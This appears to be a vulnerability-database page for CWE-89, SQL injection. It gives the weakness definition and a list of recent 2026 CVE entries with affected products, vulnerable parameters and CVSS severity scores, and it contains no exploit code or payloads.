CWE-89

High likelihood

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Parent: CWE-943 - Improper Neutralization of Special Elements in Data Query Logic

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

19,493 vulnerabilities with CWE-89
CVE-2026-25371 CRITICAL
WordPress Lumise Product Designer plugin < 2.0.9 - SQL Injection vulnerability
CVSS 9.3
CVE-2026-25340 CRITICAL
WordPress Jobmonster theme < 4.8.4 - SQL Injection vulnerability
CVSS 9.3
CVE-2026-25007 HIGH
WordPress ElementInvader Addons for Elementor plugin <= 1.4.2 - SQL Injection vulnerability
CVSS 8.5
CVE-2026-24993 CRITICAL
WordPress Advanced WooCommerce Product Sales Reporting plugin <= 4.1.3 - SQL Injection vulnerability
CVSS 9.3
CVE-2026-24977 HIGH
WordPress Organici Library plugin <= 2.1.2 - SQL Injection vulnerability
CVSS 8.5
CVE-2026-22484 CRITICAL
WordPress Lisfinity Core plugin <= 1.5.0 - SQL Injection vulnerability
CVSS 9.3
CVE-2026-4815 HIGH
SQL Injection vulnerability in Support Board
CVSS 8.8
CVE-2026-4784 HIGH
code-projects Simple Laundry System Parameter checkcheckout.php sql injection
CVSS 7.3
CVE-2026-4783 MEDIUM
itsourcecode College Management System Parameter add-single-student-results.php sql injection
CVSS 6.3
CVE-2026-4781 MEDIUM
SourceCodester Sales and Inventory System HTTP GET Parameter update_purchase.php sql injection
CVSS 6.3
CVE-2026-4780 MEDIUM
SourceCodester Sales and Inventory System HTTP GET Parameter update_out_standing.php sql injection
CVSS 6.3
CVE-2026-4779 MEDIUM
SourceCodester Sales and Inventory System HTTP GET Parameter update_customer_details.php sql injection
CVSS 6.3
CVE-2026-4778 MEDIUM
SourceCodester Sales and Inventory System HTTP GET Parameter update_category.php sql injection
CVSS 6.3
CVE-2026-4777 MEDIUM
SourceCodester Sales and Inventory System POST Parameter view_supplier.php sql injection
CVSS 6.3
CVE-2026-33539 HIGH
Parse Server: SQL injection via aggregate and distinct field names in PostgreSQL adapter
CVSS 7.2
CVE-2026-23921 HIGH
Blind, read-only SQL injection in Zabbix API via sortfield parameter
CVE-2026-30655 MEDIUM
esiclivre/esiclivre <=0.2.2 - SQL Injection
CVSS 6.5
CVE-2026-4662 HIGH
JetEngine <= 3.8.6.1 - Unauthenticated SQL Injection via Listing Grid 'filtered_query' Parameter
CVSS 7.5
CVE-2026-4632 HIGH
itsourcecode Online Enrollment System Parameter index.php sql injection
CVSS 7.3
CVE-2026-4625 HIGH
SourceCodester Online Admission System programmes.php sql injection
CVSS 7.3
CVE-2026-4624 HIGH
SourceCodester Online Library Management System Parameter home.php sql injection
CVSS 7.3
CVE-2026-3079 MEDIUM
LearnDash LMS <= 5.0.3 - Authenticated (Contributor+) SQL Injection via 'filters[orderby_order]' Parameter
CVSS 6.5
CVE-2026-4615 HIGH
Online Catering Reservation 1.0 - SQL Injection
CVSS 7.3
CVE-2026-4614 MEDIUM
itsourcecode sanitize or validate this input Parameter subjects.php sql injection
CVSS 6.3
CVE-2026-4613 HIGH
SourceCodester E-Commerce Site 1.0 - SQL Injection
CVSS 7.3
Details
Vulnerabilities 19,493
Exploit Likelihood High
Links
MITRE CWE Entry Search this CWE With Exploits